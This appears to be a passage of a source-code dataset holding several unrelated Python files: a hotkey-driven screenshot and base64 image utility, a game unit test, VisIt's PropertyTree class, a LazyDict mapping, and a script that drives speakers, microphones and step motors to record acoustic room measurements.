import b64decode, b64encode\nfrom io import BytesIO\n\nimport pyautogui\nimport pynput.keyboard\nfrom PIL import Image\n\n# 截图保存的文件夹\nimagesPath = r'./images'\n# 截图快捷键, 默认为 F8\npositionKey = pynput.keyboard.Key.f8\nmtime = 600\n\n\ndef getPositionByKey():\n \"\"\"\n 按下按键f8后返回鼠标位置\n :return:\n \"\"\"\n\n def on_press(key):\n return key != positionKey\n\n def daemon():\n t1 = time.time()\n while time.time() < t1 + mtime:\n time.sleep(1)\n return False\n\n with pynput.keyboard.Listener(on_press=on_press, daemon=daemon) as h:\n h.join()\n x, y = 
pyautogui.position()\n return x, y\n\n\ndef getBoxByKey():\n \"\"\"\n 开内需两次按下 positionKey , 获取所选区域的 box\n :return: Box(left, top, width, height)\n \"\"\"\n x1, y1 = getPositionByKey()\n x2, y2 = getPositionByKey()\n left = x1 if x1 < x2 else x2\n top = y1 if y1 < y2 else y2\n width = abs(x1 - x2)\n height = abs(y1 - y2)\n return left, top, width, height\n\n\ndef nowTime():\n \"\"\"\n 返回当前时间的 %Y-%m-%d_%H-%M-%S 格式\n :return:\n \"\"\"\n return datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n\ndef screenShotByKey():\n \"\"\"\n 按下两次快捷键后截图, 保存名称为 %Y-%m-%d_%H-%M-%S.png\n :return: 文件保存地址\n \"\"\"\n imgName = nowTime() + '.png'\n path = os.path.abspath(imagesPath + r'/' + imgName)\n if not os.path.exists(imagesPath):\n # 如果src目录不存在则创建\n os.mkdir(imagesPath)\n pyautogui.screenshot(path, region=getBoxByKey())\n return path\n\n\ndef getAllFiles(rootPath: str, expression: str) -> list:\n \"\"\"\n 获取根目录下的所有文件列表\n :param rootPath: 根目录\n :param expression: 文件名正则表达式\n :return: 根目录下的所有文件列表\n \"\"\"\n if not os.path.exists(rootPath):\n return []\n allFiles = []\n cp = re.compile(expression)\n for filename in os.listdir(rootPath):\n path = os.path.join(rootPath, filename)\n if os.path.isdir(path):\n allFiles += getAllFiles(path, expression)\n elif cp.search(path):\n allFiles.append(os.path.abspath(path))\n return allFiles\n\n\ndef imgToStr(img: Image.Image):\n \"\"\"\n 图片转为字符串\n :param img: 原图片\n :return: 图片转为的字符串\n \"\"\"\n imgByte = BytesIO()\n img.save(imgByte, format='PNG')\n byteContent = imgByte.getvalue()\n base64_bytes = b64encode(byteContent)\n return base64_bytes.decode('utf-8')\n\n\ndef strToImg(byteStr: str) -> Image.Image:\n \"\"\"\n 字符串转图片\n :param byteStr: 字符串\n :return: 字符串转为的图片\n \"\"\"\n imgByte = b64decode(byteStr)\n return Image.open(BytesIO(imgByte))\n","repo_name":"LongXingLuoLuo/free_keyboard_control","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28173352238","text":"import unittest\nfrom src.game import Game\n\n\nclass TestGame(unittest.TestCase):\n def setUp(self) -> None:\n print(\"set up\")\n\n def tearDown(self) -> None:\n print(\"tear down\")\n\n def test_game(self):\n game = Game()\n game.human_move(1, 1)\n self.assertEqual(game.board.get_symbol_from_board(1, 1), 'X')\n self.assertEqual(game.is_won(), False)\n game.human_move(1, 4)\n game.human_move(4, 1)\n game.human_move(4, 4)\n self.assertEqual(game.is_won(), True)\n","repo_name":"andreealaslo/UBB-CS","sub_path":"Semester 1/FP/Obstruction/src/tests/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"11591121640","text":"class PropertyTree(object):\n \"\"\"\n Dynamic PropretyTree class.\n\n Enables dynamic definition of tree-like python objects.\n \"\"\"\n def __init__(self,ptype =\"tree\",init = None):\n self._type = ptype\n self._locked = False\n if self._type == \"tree\":\n self._value = {}\n if not init is None:\n self.update(init)\n else:\n self._value = init\n def update(self,pval):\n \"\"\"\n Add entires from passed object.\n\n Accepts both PropertyTree and dict instances.\n \"\"\"\n if isinstance(pval,dict):\n for path,value in list(pval.items()):\n self.add_property(path,value)\n else:\n for path,value in list(pval.properties().items()):\n self.add_property(path,value)\n def clear(self):\n \"\"\"\n Clears all entries.\n 
\"\"\"\n self._locked = False\n if self._type == \"tree\":\n self._value = {}\n else:\n self._value = None\n def properties(self):\n \"\"\"\n Returns a dict that maps all PropertyTree paths to their objects.\n \"\"\"\n res = {}\n if self._type == \"tree\":\n keys = list(self._value.keys())\n for k in keys:\n curr = self._value[k]\n if curr._type==\"tree\":\n for p,v in list(curr.properties().items()):\n res[k + \"/\" + p] = v\n else:\n res[k] = curr._value\n return res\n def children(self):\n \"\"\"\n Returns a dict that maps the paths of all children of the curent\n node to their objects.\n \"\"\"\n res = {}\n if self._type == \"tree\":\n keys = list(self._value.keys())\n keys.sort()\n for k in keys:\n curr = self._value[k]\n res[k] = curr\n return res\n def add_property(self,path,value=None):\n \"\"\"\n Adds an object to the given path.\n \"\"\"\n idx = path.find(\"/\")\n if idx > 0:\n lpath = path[:idx]\n rpath = path[idx+1:]\n if not lpath in list(self._value.keys()):\n tree = PropertyTree()\n self._value[lpath] = tree\n else:\n tree = self._value[lpath]\n tree.add_property(rpath,value)\n else:\n if value is None:\n self._value[path] = PropertyTree()\n else:\n self._value[path] = PropertyTree(\"node\",value)\n def has_property(self,path):\n \"\"\"\n Returns true if an object exists at the given path.\n \"\"\"\n node = self.fetch_property(path)\n return not node is None\n def remove_property(self,path):\n \"\"\"\n Removes the object at the given path.\n \"\"\"\n # find the proper node in the tree and remove it\n idx = path.find(\"/\")\n if idx > 0:\n lpath = path[:idx]\n rpath = path[idx+1:]\n tree = self._value[lpath]\n tree.remove_property(rpath)\n elif path in list(self._value.keys()):\n del self._value[path]\n def lock(self):\n \"\"\"\n Locks the PropertyTree.\n\n Prevents creation (explcit and dynamic) of new paths.\n \"\"\"\n self._locked = True\n if self._type == \"tree\":\n for v in list(self._value.values()):\n v.lock()\n def unlock(self):\n \"\"\"\n Unlocks the PropertyTree.\n\n Allows creation (explcit and dynamic) of new paths.\n \"\"\"\n self._locked = False\n if self._type == \"tree\":\n for v in list(self._value.values()):\n v.unlock()\n def __getitem__(self,path):\n \"\"\"\n Used to provide access to paths via the [] operator.\n \"\"\"\n node = self.fetch_property(path)\n if node is None:\n if self._locked:\n raise AttributeError(path)\n self.add_property(path)\n node = self.fetch_property(path)\n if node._type == \"tree\":\n return node\n else:\n return node._value\n def __setitem__(self,path,obj):\n \"\"\"\n Used to create paths via the [] operator.\n \"\"\"\n node = self.fetch_property(path)\n if node is None:\n if self._locked:\n raise AttributeError(path)\n self.add_property(path,obj)\n else:\n node._type = \"node\"\n node._value = obj\n def fetch_property(self,path):\n \"\"\"\n Fetches the object at a given path.\n\n Returns None if the path does not exist.\n \"\"\"\n idx = path.find(\"/\")\n if idx > 0:\n lpath = path[:idx]\n if lpath in list(self._value.keys()):\n rpath = path[idx+1:]\n tree = self._value[lpath]\n return tree.fetch_property(rpath)\n return None\n elif path in list(self._value.keys()):\n return self._value[path]\n else:\n return None\n def __str__(self):\n \"\"\"\n String pretty print.\n \"\"\"\n return self.__gen_string(\"\")\n def __gen_string(self,path):\n \"\"\"\n Helper for creating a pretty print string.\n \"\"\"\n res = \"\"\n if self._type == \"tree\":\n for k in list(self._value.keys()):\n npath = path + k + \"/\"\n res += 
self._value[k].__gen_string(npath)\n else:\n res = path + \"%s:%s\\n\" % (self._type,str(self._value))\n return res\n def __getattr__(self, name):\n \"\"\"\n Used to provide access to paths via the dot operator.\n\n Calls __getitem__\n \"\"\"\n if name.startswith(\"__\") and name.endswith(\"__\"):\n raise AttributeError(name)\n try:\n return self.__getitem__(name)\n except KeyError:\n raise AttributeError(name)\n def __setattr__(self, name,obj):\n \"\"\"\n Used to create paths via the dot operator.\n\n Calls __setitem__\n \"\"\"\n if name == \"_value\" or name == \"_type\" or name == \"_locked\":\n self.__dict__[name] = obj\n else:\n self.__setitem__(name, obj)\n\n\n\n","repo_name":"visit-dav/visit","sub_path":"src/visitpy/visit_flow/flow/src/core/property_tree.py","file_name":"property_tree.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"23"} +{"seq_id":"8893207667","text":"import collections\nimport itertools\n\nclass LazyDict(collections.MutableMapping):\n def __init__(self, source, keyfunc, dict=None):\n self._source = iter(source)\n if not callable(keyfunc): raise TypeError(\"unhashable type\")\n self._keyfunc = keyfunc\n self._dict = dict if dict else {}\n\n def __len__(self):\n if self._source:\n raise AttributeError(\"length undetermined\")\n else:\n return len(self._dict)\n\n def __iter__(self):\n def tail():\n while True: yield self._next_key()\n return itertools.chain(self._dict, tail())\n\n def _next_key(self):\n item = next(self._source)\n key = self._keyfunc(item)\n\n if key in self._dict:\n raise LookupError(': '.join([\"non-unique key\", key]))\n self._dict[key] = item\n\n return key\n\n def __getitem__(self, key):\n if isinstance(key, slice):\n raise NotImplementedError(': '.join([\"unsliceable\",\n self.__class__.__name__]))\n if key in self._dict: return self._dict[key]\n if not self._source: raise KeyError(key)\n\n while True:\n try:\n if self._next_key() == key: return self._dict[key]\n except StopIteration:\n self._source = None\n raise KeyError(key)\n\n def __setitem__(self, key, value):\n self._dict[key] = value\n\n def __delitem__(self, key):\n self.__getitem__(key)\n del(self._dict[key])\n","repo_name":"beadsland/fixTracks","sub_path":"savvy/common/lazydict.py","file_name":"lazydict.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"12848637461","text":"#!/usr/bin/env python3\nfrom header import *\nfrom microphone_numbers import * \nfrom speaker_numbers import * \nfrom Record import *\nfrom ess import *\nfrom transmitter import *\nfrom receiver import *\nfrom sensor import *\nfrom webcam import *\nfrom motor import *\nfrom save import *\n\nSTART_HOUR=0\n\ninitialMicrophoneStandCoordinates=[]\ninitialSpeakerStandCoordinates=[]\n\n\ndef loadSpeakerAndMicrophonePositionsRelativeToTheirOwnStand():\n\n ## KEY'LER KUCUK HARF OLMALIDIR !!!!\n config = configparser.ConfigParser()\n \n\n if os.path.exists(DATA_DIR+\"/single-speaker/setup-properties/record.ini\") :\n setupState=input(\"Is there any change in Microphone and Speaker relative positions to their own stands ? 
(y/n)\")\n if setupState == \"y\" :\n os.replace(DATA_DIR+\"/single-speaker/setup-properties/record.ini\",DATA_DIR+\"/single-speaker/setup-properties/record.ini.org\")\n print(\"copied old config to : \"+ DATA_DIR+\"/single-speaker/setup-properties/record.ini.org\")\n os.remove(DATA_DIR+\"/single-speaker/setup-properties/record.ini\") \n \n if not os.path.exists(DATA_DIR+\"/single-speaker/setup-properties/record.ini\"):\n\n if not os.path.exists(DATA_DIR+\"/single-speaker/setup-properties\"):\n os.makedirs(DATA_DIR+\"/single-speaker/setup-properties\")\n \n\n config['speaker.positions']={}\n for speakerNo in range(NUMBER_OF_SPEAKERS):\n while True:\n r = input(f\"speaker_{speakerNo}_R (Centimeters) :\")\n try:\n r = float(r)\n break\n except ValueError:\n print ('Numbers only')\n config['speaker.positions'][f'speaker_{speakerNo}_r']=str(r)\n while True:\n z = input(f\"speaker_{speakerNo}_Z (Centimeters) :\")\n try:\n z = float(z)\n break\n except ValueError:\n print ('Numbers only')\n config['speaker.positions'][f'speaker_{speakerNo}_z']=str(z)\n\n config['mic.positions']={}\n for micNo in range(NUMBER_OF_MICROPHONES):\n while True:\n r = input(f\"mic_{micNo}_R (Centimeters) :\")\n try:\n r = float(r)\n break\n except ValueError:\n print ('Numbers only')\n config['mic.positions'][f'mic_{micNo}_r']=str(r)\n while True:\n z = input(f\"mic_{micNo}_Z (Centimeters) :\")\n try:\n z = float(z)\n break\n except ValueError:\n print ('Numbers only')\n config['mic.positions'][f'mic_{micNo}_z']=str(z)\n\n with open(DATA_DIR+\"/single-speaker/setup-properties/record.ini\", 'w') as configfile:\n config.write(configfile)\n\n #### LOAD FROM FILE\n\n config.read(DATA_DIR+\"/single-speaker/setup-properties/record.ini\")\n\n \n for speakerNo in range(NUMBER_OF_SPEAKERS):\n R_SPEAKER.append(float(config['speaker.positions'][f'speaker_{speakerNo}_r']))\n Z_SPEAKER.append(float(config['speaker.positions'][f'speaker_{speakerNo}_z']))\n \n for micNo in range(NUMBER_OF_MICROPHONES):\n R_MIC.append(float(config['mic.positions'][f'mic_{micNo}_r']))\n Z_MIC.append(float(config['mic.positions'][f'mic_{micNo}_z']))\n\n\n\n\ndef loadRoomDimensions(room_number):\n\n global ROOM_DIM_WIDTH,ROOM_DIM_DEPTH,ROOM_DIM_HEIGHT\n\n ## KEY'LER KUCUK HARF OLMALIDIR !!!!\n config = configparser.ConfigParser()\n\n \n if not os.path.exists(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties\"):\n os.makedirs(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties\")\n\n config['room.dimensions']={}\n while True:\n room_width = input(f\"room_width (Measured parallel to door face) (Centimeters) :\")\n try:\n room_width = float(room_width)\n break\n except ValueError:\n print ('Numbers only')\n config['room.dimensions'][f'room_width']=str(room_width)\n \n while True:\n room_depth = input(f\"room_depth (Measured perpendicular to door face) (Centimeters) :\")\n try:\n room_depth = float(room_depth)\n break\n except ValueError:\n print ('Numbers only')\n config['room.dimensions'][f'room_depth']=str(room_depth)\n \n while True:\n room_height = input(f\"room_height (Height of the room) (Centimeters) :\")\n try:\n room_height = float(room_height)\n break\n except ValueError:\n print ('Numbers only')\n config['room.dimensions'][f'room_height']=str(room_height)\n \n\n with open(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties/record.ini\", 'w') as configfile:\n config.write(configfile)\n\n #### LOAD FROM FILE\n\n config.read(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties/record.ini\")\n 
ROOM_DIM_WIDTH=float(config['room.dimensions']['room_width'])\n ROOM_DIM_DEPTH=float(config['room.dimensions']['room_depth'])\n ROOM_DIM_HEIGHT=float(config['room.dimensions']['room_height'])\n\ndef euclidean_distance(x1,y1,x2,y2):\n x_sqr=pow((x1-x2),2)\n y_sqr=pow((y1-y2),2)\n return math.sqrt(x_sqr+y_sqr)\n\ndef getStandPositions():\n logger.info(\"0,0 y --> + \")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\"X ###########################################################\")\n logger.info(\"| ###########################################################\")\n logger.info(\"+ ###########################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #################### DOOR ###########################\")\n\n initialMicrophoneStandCoordinatesX=-100000\n initialMicrophoneStandCoordinatesXInput=\"\"\n R_OF_THE_MICROPHONE_CARRIER=150\n while initialMicrophoneStandCoordinatesX+ R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_DEPTH or initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER < 0 :\n while True:\n initialMicrophoneStandCoordinatesXInput=input(\"Initial Microphone Stand Cooridinates X Centimeters :\")\n try :\n initialMicrophoneStandCoordinatesX=float(initialMicrophoneStandCoordinatesXInput)\n if initialMicrophoneStandCoordinatesX + R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_DEPTH :\n logger.info (f'initialMicrophoneStandCoordinatesX + R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesX + R_OF_THE_MICROPHONE_CARRIER}) > ROOM_DIM_DEPTH ({ROOM_DIM_DEPTH}) , Please RE-MEASURE the microphone stand\\'s X position')\n elif initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER < 0 :\n logger.info (f'initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER}) < 0 , Please RE-MEASURE the microphone stand\\'s X position')\n else:\n break\n except ValueError:\n print ('Numbers only')\n logger.info ('initialMicrophoneStandCoordinatesX is : '+str(initialMicrophoneStandCoordinatesX))\n initialMicrophoneStandCoordinates.append(initialMicrophoneStandCoordinatesX)\n \n initialMicrophoneStandCoordinatesY=-100000\n initialMicrophoneStandCoordinatesYInput=\"\"\n while initialMicrophoneStandCoordinatesY+ R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_WIDTH or initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER < 0 :\n while True:\n initialMicrophoneStandCoordinatesYInput=input(\"Initial Microphone Stand Cooridinates Y Centimeters :\")\n try :\n initialMicrophoneStandCoordinatesY=float(initialMicrophoneStandCoordinatesYInput)\n if initialMicrophoneStandCoordinatesY + R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_WIDTH :\n logger.info (f'initialMicrophoneStandCoordinatesY + R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesY + R_OF_THE_MICROPHONE_CARRIER}) > ROOM_DIM_WIDTH ({ROOM_DIM_WIDTH}) , Please RE-MEASURE the microphone stand\\'s Y position')\n elif 
initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER < 0 :\n logger.info (f'initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER}) < 0 , Please RE-MEASURE the microphone stand\\'s Y position')\n else:\n break\n except ValueError:\n print ('Numbers only')\n logger.info ('initialMicrophoneStandCoordinatesY is : '+str(initialMicrophoneStandCoordinatesY))\n initialMicrophoneStandCoordinates.append(initialMicrophoneStandCoordinatesY)\n\n initialMicrophoneStandCoordinatesZ=0\n initialMicrophoneStandCoordinates.append(initialMicrophoneStandCoordinatesZ)\n\n logger.info ('initialMicrophoneStandCoordinates[0] is : '+str(initialMicrophoneStandCoordinates[0]))\n logger.info ('initialMicrophoneStandCoordinates[1] is : '+str(initialMicrophoneStandCoordinates[1]))\n logger.info ('initialMicrophoneStandCoordinates[2] is : '+str(initialMicrophoneStandCoordinates[2]))\n \n \n \n \n \n\n initialSpeakerStandCoordinatesX=-100000\n initialSpeakerStandCoordinatesXInput=\"\"\n R_OF_THE_SPEAKER_CARRIER=100\n R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS=-10000\n while R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n while initialSpeakerStandCoordinatesX+ R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_DEPTH or initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER < 0 :\n while True:\n initialSpeakerStandCoordinatesXInput=input(\"Initial Speaker Stand Cooridinates X Centimeters :\")\n try :\n initialSpeakerStandCoordinatesX=float(initialSpeakerStandCoordinatesXInput)\n if initialSpeakerStandCoordinatesX + R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_DEPTH :\n logger.info (f'initialSpeakerStandCoordinatesX + R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesX + R_OF_THE_SPEAKER_CARRIER}) > ROOM_DIM_DEPTH ({ROOM_DIM_DEPTH}) , Please RE-MEASURE the speaker stand\\'s X position')\n elif initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER < 0 :\n logger.info (f'initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER}) < 0 , Please RE-MEASURE the speaker stand\\'s X position')\n #elif abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n # logger.info (f'abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX) ({abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX)}) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER ({R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER}) , Please RE-MEASURE the speaker stand\\'s X position')\n else :\n break\n except ValueError:\n print ('Numbers only')\n \n initialSpeakerStandCoordinatesY=-100000\n initialSpeakerStandCoordinatesYInput=\"\"\n\n while initialSpeakerStandCoordinatesY+ R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_WIDTH or initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER < 0 :\n while True:\n initialSpeakerStandCoordinatesYInput=input(\"Initial Speaker Stand Cooridinates Y Centimeters :\")\n try :\n initialSpeakerStandCoordinatesY=float(initialSpeakerStandCoordinatesYInput)\n if initialSpeakerStandCoordinatesY + R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_WIDTH :\n logger.info (f'initialSpeakerStandCoordinatesY + R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesY + R_OF_THE_SPEAKER_CARRIER}) > ROOM_DIM_WIDTH ({ROOM_DIM_WIDTH}) , Please RE-MEASURE the speaker stand\\'s Y position')\n if initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER < 0 :\n logger.info 
(f'initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER}) < 0 , Please RE-MEASURE the speaker stand\\'s Y position')\n elif euclidean_distance(initialSpeakerStandCoordinatesX,initialSpeakerStandCoordinatesY,initialMicrophoneStandCoordinatesX,initialMicrophoneStandCoordinatesY) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n logger.info (f'euclidean_distance(initialSpeakerStandCoordinatesX,initialSpeakerStandCoordinatesY,initialMicrophoneStandCoordinatesX,initialMicrophoneStandCoordinatesY) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER ({R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER}) , Please RE-MEASURE the speaker stand\\'s Y position')\n else:\n break\n except ValueError:\n print ('Numbers only')\n \n \n DX=abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX)\n DY=abs(initialSpeakerStandCoordinatesY-initialMicrophoneStandCoordinatesY)\n R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS=math.sqrt(DX**2+DY**2)\n if R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n initialSpeakerStandCoordinatesX=-100000\n initialSpeakerStandCoordinatesY=-100000\n logger.info (f'R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS ({R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS}) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER ({R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER}) , Please RE-MEASURE the speaker stand\\'s positions')\n \n \n logger.info ('initialSpeakerStandCoordinatesX is : '+str(initialSpeakerStandCoordinatesX))\n initialSpeakerStandCoordinates.append(initialSpeakerStandCoordinatesX)\n \n logger.info ('initialSpeakerStandCoordinatesY is : '+str(initialSpeakerStandCoordinatesY))\n initialSpeakerStandCoordinates.append(initialSpeakerStandCoordinatesY)\n \n initialSpeakerStandCoordinatesZ=0\n initialSpeakerStandCoordinates.append(initialSpeakerStandCoordinatesZ)\n\n logger.info ('initialSpeakerStandCoordinates[0] is : '+str(initialSpeakerStandCoordinates[0]))\n logger.info ('initialSpeakerStandCoordinates[1] is : '+str(initialSpeakerStandCoordinates[1]))\n logger.info ('initialSpeakerStandCoordinates[2] is : '+str(initialSpeakerStandCoordinates[2]))\n \n\n\ndef main():\n\n if len(sys.argv) > 0 :\n TEST_MODE=sys.argv[1]\n \n ess_signal=generate_ess_signal()\n #transmitSignal(0,ess_signal,\"TEST_MODE_DEVICE_MOC\")\n\n song_signal=get_song_signal()\n #transmitSignal(0,song_signal,\"TEST_MODE_DEVICE_MOC\",format =pyaudio.paFloat32)\n \n leftEssSignal=generate_left_signal(ess_signal)\n rightEssSignal=generate_right_signal(ess_signal)\n #transmitSignal(0,leftEssSignal,\"TEST_MODE_DEVICE_MOC\")\n \n \n leftSongSignal=generate_left_signal(song_signal)\n rightSongSignal=generate_right_signal(song_signal)\n #transmitSignal(0,leftSongSignal,\"TEST_MODE_DEVICE_MOC\",format =pyaudio.paFloat32)\n \n \n \n loadSpeakerAndMicrophonePositionsRelativeToTheirOwnStand()\n\n resetSpeakerStepMotor(TEST_MODE)\n resetMicrophoneStepMotor(TEST_MODE)\n \n \n\n\n\n room_number=input(\"Room Number:\")\n while room_number==\"\":\n room_number=input(\"Room Number:\")\n logger.info ('room number is : '+str(room_number))\n\n loadRoomDimensions(room_number)\n \n getStandPositions()\n\n logger.info ('MAX_NUMBER_OF_MIC_ITERATION is : '+str(MAX_NUMBER_OF_MIC_ITERATION))\n logger.info ('MAX_NUMBER_OF_SPEAKER_ITERATION is : '+str(MAX_NUMBER_OF_SPEAKER_ITERATION))\n \n 
config_number=\"micx-\"+str(initialMicrophoneStandCoordinates[0])+\"-micy-\"+str(initialMicrophoneStandCoordinates[1])+\"-spkx-\"+str(initialSpeakerStandCoordinates[0])+\"-spky-\"+str(initialSpeakerStandCoordinates[1])+\"-\"+str(RECORD_TIMESTAMP) \n \n logger.info(\"##############################################################\")\n logger.info(\" Room : \"+str(room_number))\n logger.info(\" Config : \"+str(config_number))\n \n \n logger.info(\"##############################################################\")\n\n hour=datetime.datetime.now().hour\n while hour < START_HOUR:\n hour=datetime.datetime.now().hour\n logger.info(f\"{hour} is not yet {START_HOUR}, script will start at approximately {START_HOUR}:00 - {START_HOUR}:10 \")\n time.sleep(600) ## sleep 600 seconds = 10 mins\n\n \n \n for microphoneIterationNo in range(MAX_NUMBER_OF_MIC_ITERATION):\n \n logger.info(\">>Microphone Iteration No : \"+str(microphoneIterationNo))\n if microphoneIterationNo%2 == 0 : \n speakerIterationDirection=1\n else :\n speakerIterationDirection=0\n \n for speakerIterationNo in range(MAX_NUMBER_OF_SPEAKER_ITERATION):\n logger.info(\">>>Speaker Iteration No : \"+str(speakerIterationNo))\n\n for activeSpeakerNo in range(len(SPEAKERS)):\n logger.info(\">>>>Active Speaker No : \"+str(activeSpeakerNo))\n for channelNo in range(2):\n #logger.info(\">>>> Reset USB Ports ...\")\n #process=subprocess.Popen([SCRIPT_DIR+\"/reset_usb_ports_if_test_devices_fail.sh\"],shell=True,stdout=subprocess.PIPE)\n #out,err=process.communicate()\n #print(out)\n #print(err)\n\n logger.info(\">>>>Channel No : \"+str(channelNo))\n\n if channelNo == 0 :\n essSignal=leftEssSignal\n songSignal=leftSongSignal\n else : \n essSignal=rightEssSignal\n songSignal=rightSongSignal\n record=Record()\n record.timestamp=str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y.%m.%d_%H.%M.%S'))\n record.roomNo=room_number\n record.configNo=config_number\n record.speakerMotorIterationNo=speakerIterationNo\n record.microphoneMotorIterationNo=microphoneIterationNo\n record.speakerMotorIterationDirection=speakerIterationDirection\n record.microphoneStandInitialCoordinate=initialMicrophoneStandCoordinates ## [ X , Y , Z ]\n record.speakerStandInitialCoordinate=initialSpeakerStandCoordinates ## [ X , Y , Z ]\n record.currentActiveSpeakerNo=activeSpeakerNo \n record.currentActiveSpeakerChannelNo=channelNo \n record.physicalSpeakerNo=record.getSpeakerNo()\n record.photos=takePhoto(TEST_MODE)\n record.microphoneMotorPosition=getMicrophoneMotorPosition(TEST_MODE)\n record.speakerMotorPosition=getSpeakerMotorPosition(TEST_MODE)\n\n # THESE records will be taken from /tmp/tempHum.txt by save.py\n #tempHum=getMicrophoneTemperatureHumidity()\n #record.temperatureAtMicrohponeStand=tempHum[0]\n #record.humidityAtMicrohponeStand=tempHum[1]\n #tempHum=getSpeakerTemperatureHumidity()\n #record.temperature=tempHum[0]\n #record.humidity=tempHum[1]\n record.transmittedSignal=essSignal\n \n threads=[] \n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n t = threading.Thread(target=receiveESSSignal, args = (microphoneNo, record,TEST_MODE))\n threads.append(t)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].start()\n \n transmitSignal(activeSpeakerNo,essSignal,TEST_MODE)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].join()\n\n\n if TEST_MODE == \"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds\n logger.info(\">>>>>> Transmitting and Receiving Song \")\n\n\n\n 
record.transmittedSongSignal=songSignal\n \n threads=[] \n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n t = threading.Thread(target=receiveSongSignal, args = (microphoneNo, record,TEST_MODE))\n threads.append(t)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].start()\n \n transmitSignal(activeSpeakerNo,songSignal,TEST_MODE,format =pyaudio.paFloat32)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].join()\n\n \n save(record)\n\n if TEST_MODE == \"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds\n \n # same level as \"for activeSpeakerNo in range(len(SPEAKERS)):\" above.\n logger.info(\">>>> Speaker Iteration Direction is : \"+str(speakerIterationDirection))\n moveSpeakerStepMotor(speakerIterationDirection,speakerIterationNo,TEST_MODE)\n logger.info(\">>>> Sleep 10 seconds , Wait the step motor noise to fade out...\")\n if TEST_MODE == 